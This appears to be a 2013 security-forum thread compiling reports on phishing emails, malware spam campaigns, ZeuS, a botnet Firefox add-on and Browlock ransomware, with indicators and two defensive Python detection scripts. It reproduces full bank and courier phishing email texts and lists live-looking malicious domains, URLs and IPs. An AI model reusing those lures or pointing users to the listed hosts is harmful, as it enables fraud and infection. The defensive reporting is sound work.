Last Updated: 2013-12-11 13:43:23 UTC - "... The initial bait is a message that you may receive from one of your Facebook friends, whose account was compromised. The message claims to contain a link to images that show a crime that was committed against the friend or a close relative of the friend. The image below shows an example, but the exact message varies. The images then claim to be housed on Tumblr.
> https://isc.sans.edu/diaryimages/images/Screen%20Shot%202013-12-10%20at%209_37_46%20PM.png
The Tumblr links follow a pattern, but appear to be different for each recipient. The host name is always two or three random English words, and the URL includes a few random characters as an argument. The preview of the Tumblr page lists some random words and various simple icons. Once the user clicks on the link to the Tumblr page, they are immediately redirected to a very plausible Facebook phishing page, asking the user to log in. The links I have seen so far use the "noxxos .pw" domain, which uses a wildcard record to resolve to 198.50.202.224 ... The fake Facebook page will ask the user for a username and password as well as for a "secret question". Finally, the site attempts to run a java applet (likely an exploit, but haven't analyzed it yet), and the user is sent to a Youtube look-alike page asking the user to download and install an updated "Youtube Player". The player appears to be a generic downloader with mediocre AV detection.
- https://www.virustotal.com/en/file/d23456ffeaad7183176e71870957a222d20025a35e8e1070bd81bc7491ab625b/analysis/1386730327/
(was 3/42 when I first saw it. Now 10/42 improved). As an indicator of compromise, it is probably best right now to look for DNS queries for "noxxos .pw" as well as connections to 198.50.202.224 ..."

- https://www.virustotal.com/en-gb/ip-address/198.50.202.224/information/
___

NatWest Banking Phish
- http://threattrack.tumblr.com/post/69721298913/natwest-banking-phish
Dec 11, 2013 - "Subjects Seen:
Account Alert !
Typical e-mail details:
Dear <removed>
Your password was entered incorrectly more than 5 times.
Because of that , our security team had to suspend your accounts and all the funds inside.
Your account access and the hold on your funds will be released as soon as you verify your information.
Review Your Account Activity
We are sorry for this inconvenience but this is a security measure which we must apply to ensure your account safety.
If you have already confirmed your information then please disregard this message
Thanks for choosing NatWest UK
NatWest Security Team

Malicious URLs: didooc .co .uk/images/stories/android/index.php
149.255.62.19 - https://www.virustotal.com/en-gb/ip-address/149.255.62.19/information/

Screenshot: https://31.media.tumblr.com/313a5cf56ecbca5bfc7af94a66ca3691/tumblr_inline_mxnvtazkSB1r6pupn.png

:mad: :fear::sad:
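
Both items above end with concrete indicators (the wildcard "noxxos .pw" domain and 198.50.202.224 from the ISC diary, the didooc .co .uk path and 149.255.62.19 from the NatWest phish). The script below is an added example, not code from ISC, ThreatTrack or the forum poster, that runs those indicators over a few constructed DNS/proxy log lines. The log format is an assumption made for the example; the point it adds to the text is that a wildcard DNS record means any subdomain must be matched, while a look-alike such as "noxxos.pw.example.org" must not.

```python
"""Flag DNS/proxy log lines that touch the indicators quoted in this post.

Added example (not from ISC, ThreatTrack or the forum poster). The log line
format below is constructed for the example; adapt the regex to your own
DNS or proxy logs.
"""
import ipaddress
import re

# Indicators quoted in the post above. The noxxos .pw entry uses a wildcard
# DNS record, so any subdomain of it must match as well.
DOMAIN_IOCS = {"noxxos.pw", "didooc.co.uk"}
IP_IOCS = {ipaddress.ip_address("198.50.202.224"),
           ipaddress.ip_address("149.255.62.19")}

# Constructed sample lines: "<timestamp> <client> <kind> <value>"
SAMPLE_LOG = """\
2013-12-11T09:01:02Z 10.0.0.14 dns abc.noxxos.pw
2013-12-11T09:01:03Z 10.0.0.14 connect 198.50.202.224:443
2013-12-11T09:02:10Z 10.0.0.22 dns www.example.org
2013-12-11T09:02:11Z 10.0.0.22 connect 93.184.216.34:80
2013-12-11T09:05:40Z 10.0.0.31 dns noxxos.pw.example.org
2013-12-11T09:07:00Z 10.0.0.31 dns NOXXOS.PW.
2013-12-11T09:08:15Z 10.0.0.40 connect 149.255.62.19:80
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(dns|connect)\s+(\S+)$")


def domain_matches(name, iocs):
    """True if name equals an indicator or is a subdomain of it.

    Lower-cases and strips a trailing dot so DNS-style names compare cleanly.
    The indicator must be a label-boundary suffix: 'noxxos.pw.example.org'
    does not match 'noxxos.pw'.
    """
    name = name.lower().rstrip(".")
    return any(name == ioc or name.endswith("." + ioc) for ioc in iocs)


def ip_matches(endpoint, iocs):
    """endpoint is 'ip' or 'ip:port'; compare only the address part."""
    host = endpoint.rsplit(":", 1)[0] if endpoint.count(":") == 1 else endpoint
    try:
        return ipaddress.ip_address(host) in iocs
    except ValueError:
        return False  # not an address at all, so it cannot be an IP indicator


def scan_log(text, domain_iocs=DOMAIN_IOCS, ip_iocs=IP_IOCS):
    """Return (client, kind, value) for every line that hits an indicator."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of crashing the scan
        _ts, client, kind, value = m.groups()
        if kind == "dns" and domain_matches(value, domain_iocs):
            hits.append((client, kind, value))
        elif kind == "connect" and ip_matches(value, ip_iocs):
            hits.append((client, kind, value))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("IOC hit:", *hit)
```

Run against the constructed log the scan reports four hits (two from client 10.0.0.14, the upper-cased query from 10.0.0.31, and the NatWest IP from 10.0.0.40) and correctly ignores the look-alike "noxxos.pw.example.org" query.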

AplusWebMaster
2013-12-12, 17:01
FYI...

Top 5 Most Dangerous Email Subjects ...
- http://community.websense.com/blogs/securitylabs/archive/2013/12/11/new-phishing-research-5-most-dangerous-email-subjects-top-10-hosting-countries.aspx
11 Dec 2013 - "... the top five subject lines in worldwide phishing emails are the following: (Based on research conducted 1/1/13-9/30/13)
1. Invitation to connect on LinkedIn
2. Mail delivery failed: returning message to sender
3. Dear <insert bank name here> Customer
4. Comunicazione importante
5. Undelivered Mail Returned to Sender
The list above portrays how cybercriminals are attempting to fool recipients into clicking a malicious link or downloading an infected file by using business-focused and legitimate-looking subject lines. Scammers will use any means necessary to increase the likelihood of an inspire-to-click campaign...
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Components.ImageFileViewer/CommunityServer.Blogs.Components.WeblogFiles.securitylabs/1067.3364.Spearphising_2D00_Infographic_2D00_ml_2D00_Nov2013_5F00_WEB.jpg_2D00_550x0.jpg
___

Fake tech support scams/SPAMs on YouTube
- http://blog.malwarebytes.org/fraud-scam/2013/12/tech-support-scammers-spam-youtube-with-robot-like-warnings/
Dec 12, 2013 - "... In a twisted new variant, crooks are calling out to all antivirus / anti-malware customers and urging them to fix their computers now. One such account was spamming -YouTube- with hundreds of videos, all using a computer-generated voice and personalized for each AV/Anti-Malware company:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/12/vendors.png
... The company behind this scam is “My Tech Gurus” (http ://www.mytechgurus .com):
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/12/website.png
Once on the phone, I am quickly directed to a remote technician and instructed to hang the call to pursue the support session directly through the chat window on my computer:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/12/chatsession1.png
... If the ‘technician’ were honest, she would tell me there is absolutely nothing wrong with this computer... Instead she wastes no time in making up fake errors... here is the ‘technical’ explanation:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/12/thedetails.png
Of course, fixing those ‘errors’ is not going to be free:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/12/pay.png
... most of their website’s traffic comes from… India:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/12/india.png
... we encourage everyone to report each incident. We have created a guide* for victims that describes the variations of scams and what to do in each case. It may seem like a never-ending battle, but at the end of the day, if we’ve managed to save even just one person, then we can feel confident we’re doing the right thing..."
* http://blog.malwarebytes.org/tech-support-scams/
___

Fake FedEx SPAM - Malware Emails
- http://www.hoax-slayer.com/fedex-shipping-confirmation-malware-email.shtml
Dec 12, 2013 - "Email purporting to be from delivery company FedEx claims that a package delivery could not be completed because important information was missing. Recipients are instructed to click a link to verify their identity or risk having the package returned to sender... invites users to download "verification manager" software. If downloaded and run, the bogus "verification manager" will install malware on the user's computer:
From: FedEx UK
Subject: Package for you
SHIPPING CONFIRMATION
Dear [email address removed]
We have a package for you!
Unfortunately some important information is missing to complete the delivery.
Please follow the link to verify your identity:
verify your identity now!
You have 24 hours to compleate the verification! Otherwise the package will be returned to sender!
Order confirmation number: 56749951703
Order date: 03/12/2013
Thank you for choosing FedEx...
> http://www.hoax-slayer.com/images/fedex-verify-identity-malware-1.jpg
... Those who fall for the ruse and click the link will be taken to a -bogus- website tricked up to resemble a genuine FedEx webpage. Once on the page, they will be instructed to download and install a piece of software called the "FedEx Verification Manager", as shown in the following screenshot:
> http://www.hoax-slayer.com/images/fedex-verify-identity-malware-2.jpg
... following the instructions will not install a verification manager as claimed. Instead, it will install a trojan on the victim's computer..."
___

Spam Campaign delivers Liftoh Downloader
- http://www.secureworks.com/cyber-threat-intelligence/threats/spam-campaign-delivers-liftoh-downloader/
12/12/13 - "... researchers analyzed an ongoing spam campaign that uses the "UPS delivery notification tracking number" lure to infect unsuspecting users. While UPS-related spam emails are common, this particular campaign has been observed since October 2013 and uses exploit-laden documents to deliver its payload. The initial delivered payload is the Liftoh downloader trojan, which in turn downloads additional malware as a secondary payload onto the victim's system... the spam email containing a link to a malicious "Rich Text Format" (RTF) file. The malicious RTF is attached to the email, disguised as a .doc file.
> http://www.secureworks.com/assets/image_store/png/page.intelligence.threats.liftoh.1.png
... The spoofed sender is <auto-notify @ ups . com> or <auto @ ups . com>, but the headers reveal some of the actual senders (see Table 1). Some of the hosts listed in Table 1 may have appeared in DNS blacklisting lists such as SpamhausDBL, PSBL, SURBL, and SORBS, and some hosts are offline as of this publication. These hosts might have been compromised and used for SMTP relays, or could be part of a “use-and-throw” attacker-owned spam infrastructure... researchers observed the following domains in spam recipient email addresses:
gicom . nl
mvdloo . nl
cneweb . de
yahoo . fr
helimail . de
online . fr
tq3 . co. uk
excel . co. jp
smegroup . co . uk
fujielectric . co . jp
st-pauls . hereford . sch . uk
The RTF file contains exploits for patched vulnerabilities CVE-2012-0158 (MSCOMCTL.OCX RCE vulnerability) and CVE-2010-3333 (RTF stack buffer overflow vulnerability). Opening the RTF file drops and launches an empty document file in the user's %TEMP% folder with filename "cv.doc". Successful execution of the exploit code drops the Liftoh downloader malware onto the victim's system. This malware was observed spreading via Skype and other instant messenger applications in May 2013. Liftoh also downloaded the Phopifas worm as a secondary payload... event monitoring shows organizations in the following market verticals have been affected by Liftoh:
Banking
Manufacturing
Healthcare
Legal
Credit unions
Retail
Technology providers
... It is very likely that the threat actors will switch to other delivery mechanisms in the future that use social engineering techniques to maximize infection yields. It is also likely that the threat actors may leverage the Liftoh downloader to deliver a variety of other malware as secondary payloads..."
(More detail at the secureworks URL above.)
___

64-bit ZeuS - enhanced with Tor - banking malware
- https://www.securelist.com/en/blog/208214171/The_inevitable_move_64_bit_ZeuS_has_come_enhanced_with_Tor
Dec 11, 2013 - "The more people switch to 64-bit platforms, the more 64-bit malware appears. We have been following this process for several years now. The more people work on 64-bit platforms, the more 64-bit applications that are developed as well. Sometimes these include some very specific applications, for example, banking applications... If someone wants to hack into an application like this and steal information, the best tool for that would also be a 64-bit agent. And what’s the most notorious banking malware? ZeuS, of course – the trendsetter for the majority of today’s banking malware... we spotted a 32-bit ZeuS sample maintaining a 64-bit version inside... Whatever the intentions were of the malware author that created this piece of ZeuS – be it a marketing ploy or the groundwork for some future needs – a pure 64-bit ZeuS does finally exist, and we can conclude that a new milestone in the evolution of ZeuS has been reached. Moreover, this sample has revealed that another distinct feature has been added to ZeuS functionality - ZeuS malware has the ability to work on its own via the Tor network with onion CnC domains, meaning it now joins an exclusive group of malware families with this capability."

:mad: :fear:
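
The Liftoh item above turns on one detail: the RTF exploit document is attached "disguised as a .doc file", and Word opens it regardless of the extension because it sniffs the content. A mail gateway can do the same sniffing. The script below is an added example, not SecureWorks' code, that compares an attachment's extension against its leading bytes; the attachments are constructed byte strings, not samples from the campaign, and the extension-to-format table is an assumption chosen for the example.

```python
"""Check whether an attachment named .doc really is a binary Word file.

Added example (not SecureWorks' code). Word opens an RTF even when it is
named .doc, so a gateway that trusts the extension misses the mismatch.
The sample attachments below are constructed byte strings.
"""
import os

# Leading bytes (magic numbers) of the formats involved.
OLE2_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"  # legacy .doc (Compound File)
RTF_MAGIC = b"{\\rt"   # Word accepts a truncated "{\rt" header, so match that
ZIP_MAGIC = b"PK\x03\x04"  # OOXML (.docx) is a ZIP container

# Which sniffed format is legitimate for which extension (assumed policy).
EXPECTED = {
    ".doc": ("ole2",),
    ".docx": ("zip",),
    ".rtf": ("rtf",),
}


def sniff(data):
    """Return a format label from the leading bytes, or 'unknown'.

    Leading whitespace is skipped because Word tolerates it before '{\\rt'.
    """
    head = data.lstrip()[:8]
    if head.startswith(OLE2_MAGIC):
        return "ole2"
    if head.startswith(RTF_MAGIC):
        return "rtf"
    if head.startswith(ZIP_MAGIC):
        return "zip"
    return "unknown"


def check_attachment(filename, data):
    """Return (verdict, detail); 'mismatch' means the extension lies about the content."""
    ext = os.path.splitext(filename)[1].lower()
    actual = sniff(data)
    allowed = EXPECTED.get(ext)
    if allowed is None:
        return ("unchecked", f"no rule for extension {ext or '(none)'}")
    if actual in allowed:
        return ("ok", f"{ext} contains {actual} as expected")
    return ("mismatch", f"{ext} attachment actually contains {actual}")


# Constructed attachments: a genuine binary .doc header, an RTF renamed to
# .doc as in the campaign, a .docx (ZIP) and a plain .rtf for comparison.
SAMPLES = {
    "invoice.doc": OLE2_MAGIC + b"\x00" * 504,
    "UPS_tracking.doc": b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Arial;}}\\par }",
    "report.docx": ZIP_MAGIC + b"\x14\x00\x00\x00",
    "notes.rtf": b"{\\rtf1 hello}",
    "readme.txt": b"plain text",
}


def scan_all(samples=SAMPLES):
    """Apply check_attachment to every sample; returns {name: (verdict, detail)}."""
    return {name: check_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, (verdict, detail) in scan_all().items():
        print(f"{verdict:9} {name}: {detail}")
```

The mismatch verdict on "UPS_tracking.doc" is the signal worth quarantining on: a genuine binary Word file starts with the Compound File header, never with "{\rt". Sniffing only proves the container, so an RTF correctly named .rtf still needs separate inspection for the embedded objects the campaign relies on.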

AplusWebMaster
2013-12-13, 19:30
FYI...

Fake Amazon order SPAM
- http://threattrack.tumblr.com/post/69880436154/amazon-com-order-confirmation-spam
Dec 13, 2013 - "Subjects Seen:
Your Amazon.com order HZ1517235
Typical e-mail details:
Good day,
Thank you for your order. We’ll let you know once your item(s) have dispatched.You can view the status of your order or make changes to it by visiting Your Orders on Amazon.com.
Order Details
Order WD4202401 Placed on December 9, 2013
Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon. Amazon .com

Malicious File Name and MD5:
ORDER_JB46238.zip (765FD2406623781F6F9EB4893C681A5B)
ORDER_JB46238.exe (26E57BDE90B43CF6DAE6FD5731954C61)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/def8933618a1f5be4e260a22d0ae1c5a/tumblr_inline_mxr13wZhzU1r6pupn.png

Tagged: Amazon, Wauchos
___

Bitcoin stealing SPAM
- http://www.arbornetworks.com/asert/2013/12/bitcoin-alarm-bitcoin-stealing-spam/
Dec 12, 2013 - "The rise in Bitcoin values seems to have caused an equal increase of Bitcoin -spam- as malware authors attempt to make money off the many new market participants. One site that was spammed to me three times in one day is bitcoin-alarm .net. I ignored it the first two times, but they must have really wanted me to look at it, so who am I not to oblige.
> http://www.arbornetworks.com/asert/wp-content/uploads/2013/12/btclogo-300x36.png
The site promises a tool to notify you of market changes by SMS, without ever mentioning any nefarious behaviour. YouTube videos teach you what Bitcoin is, and how to install this free tool. They even provide a link so you can donate to the author, although it appears no one has chosen to do so. This I have to download.
> http://www.arbornetworks.com/asert/wp-content/uploads/2013/12/AppScreenshot.png
The download BitcoinAlarm.exe (MD5: edfa12d4a454b0eb786bbe92050ab88a) had just 1 hit on VirusTotal* when I first scanned it... This free utility is nothing more than malware with very low detection rate being spammed to anyone that might have a Bitcoin sitting around. When I checked the domain with urlvoid it had zero ‘bad’ reports and was -not- blacklisted... On a recheck BitcoinAlarm.exe’s detection is up to 14 of 49 scanners, and the download link appears to return 404..."
* https://www.virustotal.com/en/file/3e032b8c58aa17811d74f92658196374c2b8e6670640c121582690dab00573a0/analysis/

82.221.129.16
- https://www.virustotal.com/en/ip-address/82.221.129.16/information/
___

Fake - Halifax Bank Phishing Scam
- http://www.hoax-slayer.com/halifax-third-party-intrusions-phishing.shtml
Dec 13, 2013 - "... The email is -not- from Halifax. Links in the message open a -fake- website that contains web forms designed to steal the recipient's account login details, credit card data and other personal information...
> http://www.hoax-slayer.com/images/halifax-intrusions-phishing-1.jpg
... According to this message, which purports to be from UK bank, Halifax, third party intrusions have been detected on the recipient's account and, as a result, the account has been limited for security reasons. Supposedly, to restore access, the account holder must confirm his or her identity and verify that the account has not been used for fraud. The email instructs the recipient to access a "validation form" by clicking a link... Halifax customers who fall for the lies in the scam email and click the link will be taken to a -fake- website designed to look like the real Halifax site and asked to login:
> http://www.hoax-slayer.com/images/halifax-intrusions-phishing-2.jpg
Next, they will be asked to provide name and contact information:
> http://www.hoax-slayer.com/images/halifax-intrusions-phishing-3.jpg
And, on a final form, they will be asked to provide their card details:
> http://www.hoax-slayer.com/images/halifax-intrusions-phishing-4.jpg
After the final form is completed, victims will be automatically redirected to the genuine Halifax website and, at least until the criminals begin using the stolen information, they may remain unaware that they have just been scammed. Using the information provided on the fake forms, the scammers can hijack genuine Halifax accounts, lock out their rightful owners and commit banking and credit card fraud. The bank has published information about Halifax phishing scams, including how to report any that you receive, on its website*..."
* http://www.halifax.co.uk/aboutonline/security/common-threats/phishing/

:fear: :mad:

AplusWebMaster
2013-12-14, 20:34
FYI...

Malware Spam uses Geolocation to Mass Customize Filename
- https://isc.sans.edu/diary.html?storyid=17222
Last Updated: 2013-12-14 15:16:44 UTC - "Malicious e-mails usually fall into two groups: Mass-mailed generic e-mails, and highly customized spear phishing attempts. In between these two groups fall e-mails that obviously do more to "mass customize" the e-mail based on information retrieved from other sources. E-mails that appear to come from your Facebook friends, or malware that harvests other social networks like Linkedin to craft a more personalized message... received one e-mail... falls into the third category. The sender went through the trouble to craft a decent personalized message, trying to make me install some Spyware. In this example, the e-mail advised me of a new "WhatsApp" message that may be waiting for me. The e-mail looks legit, and even the link is formed to make it look like a voicemail link with the little "/play" ending:
> https://isc.sans.edu/diaryimages/images/Screen%20Shot%202013-12-14%20at%209_48_56%20AM.png
... the executable you are offered as you download the emails. The downloaded file is a ZIP file, and the file name of the included executable is adjusted to show a phone number that matches the location of the IP address from which the e-mail is downloaded... anti-malware coverage is -bad- according to Virustotal [1]. Anubis doesn't show much interesting stuff here, but I wouldn't be surprised if the malware detected that it ran in an analysis environment [2]. Interestingly, it appears to pop up Notepad with a generic error message..."
[1] https://www.virustotal.com/en/file/39457d452107fc019d0ece92d7a5c0c8d00ac5bf8dc3bd2411b0ad90cbcae194/analysis/1387029444/
[2] http://anubis.iseclab.org/?action=result&task_id=15eb462c46d9b95f4ed4d2750b1a52b0a

A few variants...
- http://blog.dynamoo.com/2013/12/your-friend-has-just-sent-you-pic-spam.html
11 Dec 2013

- http://www.webroot.com/blog/blog/2013/11/22/fake-whatsapp-voice-message-notification-themed-emails-expose-users-malware/
Nov 22, 2013

:mad: :fear:

AplusWebMaster
2013-12-16, 15:49
FYI...

Bogus Firefox add-on joins PC's to botnet - drive-by malware
- http://krebsonsecurity.com/2013/12/botnet-enlists-firefox-users-to-hack-web-sites/
Dec 16, 2013 - "An unusual botnet that has ensnared more than 12,500 systems disguises itself as a legitimate add-on for Mozilla Firefox and forces infected PCs to scour Web sites for vulnerabilities that can be used to install malware... The botnet, dubbed “Advanced Power” by its operators, appears to have been quietly working since at least May 2013. It’s not clear yet how the initial infection is being spread, but the malware enslaves PCs in a botnet that conducts SQL injection attacks on virtually any Web sites visited by the victim... SQL injection attacks take advantage of weak server configurations to inject malicious code into the database behind the public-facing Web server. Attackers can use this access to booby-trap sites with drive-by malware attacks, or force sites to cough up information stored in their databases. Although this malware does include a component designed to steal passwords and other sensitive information from infected machines, this feature does not appear to have been activated on the infected hosts. Rather, the purpose of this botnet seems to be using the compromised Windows desktops as a distributed scanning platform for finding exploitable Web sites. According to the botnet’s administrative panel, more than 12,500 PCs have been infected, and these bots in turn have helped to discover at least 1,800 Web pages that are vulnerable to SQL injection attacks.
The fraudulent Firefox add-on:
> http://krebsonsecurity.com/wp-content/uploads/2013/12/sql-addon.png
The malicious code comes from sources referenced in this Malwr writeup* and this Virustotal** entry... On infected systems with Mozilla Firefox installed, the bot code installs a browser plugin called “Microsoft .NET Framework Assistant”... The malicious add-on then tests nearly every page the infected user visits for the presence of several different SQL injection vulnerabilities..."
(More detail at the krebsonsecurity URL above.)
* https://malwr.com/analysis/MTI2YzFkODZkNzA0NDVkYTkzNDBmZTg5YjdkMjM3MDA/

- https://malwr.com/

** https://www.virustotal.com/en/file/19b523e0db7d612dd439147956589b0c7fe264f1eb183ea3a74565ad20d3cb8a/analysis/

- https://addons.mozilla.org/en-US/firefox/blocked/i508
Blocked on December 16, 2013...
"Microsoft .NET Framework Assistant (malware) has been blocked for your protection.
Why was it blocked?
This is -not- the Microsoft .NET Framework Assistant created and distributed by Microsoft. It is a -malicious- extension that is distributed under the same name to trick users into installing it, and turns users into a botnet that conducts SQL injection attacks on visited websites..."

- https://www.virustotal.com/en/ip-address/216.250.115.143/information/
2013-12-18
- http://google.com/safebrowsing/diagnostic?site=AS:8560
___

More Fake Amazon order SPAM ...
- http://www.hoax-slayer.com/amazon-order-details-malware.shtml
Dec 16, 2013 - "... The email is -not- from Amazon and the attached file does not contain order details. Instead, the attached .zip file harbours a malicious .exe file that, if opened, can install a trojan on the user's computer...
> http://www.hoax-slayer.com/images/amazon-order-details-malware-2013-1.jpg
... Amazon did -not- send the email and the attached .zip file does not contain order details as claimed. If opened, the .zip file reveals a .exe file. And, if users run this .exe file, a trojan may be installed on their computers... such trojans can harvest personal and financial information such as account login data from the compromised computer and send it to criminals waiting online. It may also allow the criminals to take control of the infected computer. The criminals hope that at least a few recipients, who have not made any recent Amazon orders, will be panicked into opening the attachment in the mistaken belief that a purchase has been made in their names... users who have recently bought items on Amazon might be tricked into opening the attachment in the belief that the file it contains pertains to their order..."
___

Bitcoin price hike spurs Malware, Wallet Theft
- http://blog.trendmicro.com/trendlabs-security-intelligence/bitcoin-price-hike-spurs-malware-wallet-theft/
Dec 16, 2013 - "The past few weeks have been rather exciting for Bitcoin owners and speculators, with prices peaking at over $1200 per BTC... This is giving rise to more Bitcoin-related threats. Victims are now being used either to “mine” Bitcoins; in addition the Bitcoin wallets of existing users are now tempting targets for theft as well. From September to November, feedback from the Smart Protection Network indicated that more than 12,000 PCs globally had been affected by Bitcoin-mining malware:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/12/bitcoin.jpg
... Bitcoin is promoted as being “anonymous”, but in a way nothing could be further from the truth. Because all Bitcoin transactions are public, it is possible to see all the transactions a user has made. Therefore, given enough circumstantial evidence, it may be possible to get the identity of a user... while Bitcoin may be a product of the 21st century, at the same time it is something that has been around for centuries – cash. The same caution and prudence that applies to handling cash should be applied here as well."
___

Google Play - suspicious apps leak Google Account IDs
- http://blogs.mcafee.com/mcafee-labs/suspicious-apps-on-google-play-leak-google-account-ids
Dec 16, 2013 - "The Google account ID (or account name), which in most cases is a Gmail address, is one of the key identifiers of -Android- device users. McAfee has confirmed a substantial amount of suspicious apps secretly collect Google account IDs on Google Play. In these cases, the corresponding Google account password is not collected, but leaking only IDs still poses a certain level of security and privacy risk. Two particular apps, one a dating service app and the other a fortune app, retrieve Google account IDs and send them to their web server just after they launch and without prior notice to users. The total number of downloads of each app is between 10,000 and 50,000...
> http://blogs.mcafee.com/wp-content/uploads/galeaker-1.png
Another set of suspicious apps, from various categories, shown in the figure below* secretly send a device’s Google account ID, IMEI, and IMSI to a single, shared remote web server just after launch and without any prior notice. The aggregate download count of this set of apps amounts to at least several million, probably because they are localized for many languages. It appears the main targets are Japanese users...
* http://blogs.mcafee.com/wp-content/uploads/galeaker-2.png
More than 30 suspicious apps leak Google account IDs, IMEI, and IMSI... We have not confirmed why the app developers secretly collect Google account IDs, or how they use them and how they manage the data securely. And we have not so far observed any malicious activities based on the stolen data. But at least these apps should notify users of the collection and of the intended use of their data–and give them opportunity to -decline- the data transfer. Android apps can retrieve Google account IDs with GET_ACCOUNTS permission granted at installation and by using one of the methods of the AccountManager class. This permission is often requested when an app uses the Google Cloud Messaging feature, which is a standard mechanism provided by Google to allow server-to-device push notification. As such, users cannot judge if granting this permission is really safe; some apps request this permission for GCM, but others for collecting account information for potentially malicious purposes...
A GET_ACCOUNTS permission request:
> http://blogs.mcafee.com/wp-content/uploads/galeaker-3e.png
... With the GET_ACCOUNTS permission granted, Android apps can also retrieve account names for services other than Google that have been registered in the device, including Facebook, Twitter, LinkedIn, Tumblr, WhatsApp, and so on. Users will face these same issues once these other account names are stolen... We strongly recommend that users review the privacy settings on all the services they employ and disable the “allow search by email address” option unless they really want it. Users should also -not- expose their account names..."

:fear::fear: :mad:

AplusWebMaster
2013-12-18, 00:20
FYI...

Video: Parcel Reshipping Scams, Parcel Mules and Fake Job Offers
- http://blog.dynamoo.com/2013/12/video-parcel-reshipping-scams-parcel.html
17 Dec 2013 - "A brief presentation on how parcel reshipping scams work, and the role of parcel mules and fake job offers..."
(See the dynamoo URL above for the video.)

:mad: :fear: :sad:

AplusWebMaster
2013-12-18, 16:12
FYI...

Malvertising campaign leads to Browser-Locking Ransomware
- http://www.symantec.com/connect/blogs/massive-malvertising-campaign-leads-browser-locking-ransomware
17 Dec 2013 - "The Browlock ransomware (Trojan.Ransomlock.AG) is probably the simplest version of ransomware that is currently active. It does not download child abuse material, such as Ransomlock.AE, or encrypt files on your computer, like Trojan.Cryptolocker. It does not even run as a program on the compromised computer. This ransomware is instead a plain old Web page, with JavaScript tricks that prevent users from closing a browser tab. It determines the user’s local country and makes the usual threats, claiming that the user has broken the law by accessing pornography websites and demands that they pay a fine to the local police.
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Browlock%201%20edit.png
What is substantial is the number of users getting redirected to the Browlock website. In November, Symantec blocked more than 650,000 connections to the Browlock website. The same trend continues in December. More than 220,000 connections were blocked just 11 days into December. Overall, about 1.8 million connections have been blocked since tracking began in September. These numbers may not seem particularly large for those familiar with exploit kits and traffic redirection systems, but they solely represent users of Symantec products. The 650,000 connections detected in November is merely a piece of the pie, but the real number is likely to be much larger.
Browlock ransomware’s activity in November and December this year
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Browlock%202.png
... The Browlock attackers appear to be purchasing traffic that redirects many different visitors to their malicious website. They are using malvertising, an increasingly common approach which involves purchasing advertising from legitimate networks. The advertisement is directed to what appears to be an adult Web page, which then redirects to the Browlock website... In a recent example, the attackers created several different accounts with an advertising network, deposited payment, and began buying traffic to redirect users to a website with a name that resembles an online chat forum. When the user visits the page, they are then redirected to the Browlock site. In fact, the attacker hosts the legitimate-looking domain name on the same infrastructure as the ransomware site itself... Symantec has identified 29 different law enforcement values, representing approximately 25 regions. The following graph shows the percentage of connections for the top ten law enforcement agencies identified. We found that traffic from the US was the most common. This is followed by Germany, then Europol, which covers European countries when no specific image template has been created.
Top ten regions targeted by Browlock
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Browlock%203.png
... We have seen 196 domains since tracking began. The domains adhere to the format of a single letter followed by four digits and then .com. The actual domains have been hosted on a number of different IP addresses over the past four months. The most active Autonomous System (AS) has been AS48031 - PE Ivanov Vitaliy Sergeevich, which was used in each of the past four months. The attackers rotated through seven different IP addresses in this AS. The Browlock ransomware tactic is simple but effective. Attackers save money by -not- using a malicious executable or accessing an exploit kit. As the victim simply needs to close their browser to escape from the Web page, one might think that no one will pay up. However, the Browlock attackers are clearly spending money to purchase traffic and so they must be making a return on that investment. The usual ransomware tactic of targeting users of pornographic websites continues to capitalize on a victim’s embarrassment and may account for the success rate...
Malicious infrastructures used:
AS24940 HETZNER-AS Hetzner Online AG*
IP address: 144.76.136.174 Number of redirected users: 2,387
AS48031 – PE Ivanov Vitaliy Sergeevich
IP address: 176.103.48.11 Number of redirected users: 37,521
IP address: 193.169.86.15 Number of redirected users: 346
IP address: 193.169.86.247 Number of redirected users: 662,712
IP address: 193.169.86.250 Number of redirected users: 475,914
IP address: 193.169.87.14 Number of redirected users: 164,587
IP address: 193.169.87.15 Number of redirected users: 3,945
IP address: 193.169.87.247 Number of redirected users: 132,398
AS3255 – UARNET
IP address: 194.44.49.150 Number of redirected users: 28,533
IP address: 194.44.49.152 Number of redirected users: 134,206
AS59577 SIGMA-AS Sigma ltd
IP address: 195.20.141.61 Number of redirected users: 22,960
Nigeria Ifaki Federal University Oye-ekiti
IP address: 196.47.100.2 Number of redirected users: 47,527
AS44050 - Petersburg Internet Network LLC
IP address: 91.220.131.106 Number of redirected users: 81,343
IP address: 91.220.131.108 Number of redirected users: 75,381
IP address: 91.220.131.56 Number of redirected users: 293
AS31266 INSTOLL-AS Instoll ltd.
IP address: 91.239.238.21 Number of redirected users: 8,063 "

Diagnostic page for AS24940 (HETZNER-AS)
* http://google.com/safebrowsing/diagnostic?site=AS:24940
"... over the past 90 days, 4337 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-12-18, and the last time suspicious content was found was on 2013-12-18... Over the past 90 days, we found 683 site(s)... appeared to function as intermediaries for the infection of 1634 other site(s)... We found 514 site(s)... that infected 5040 other site(s)..."

Diagnostic page for AS48031 (XSERVER-IP-NETWORK-AS)
- http://google.com/safebrowsing/diagnostic?site=AS:48031
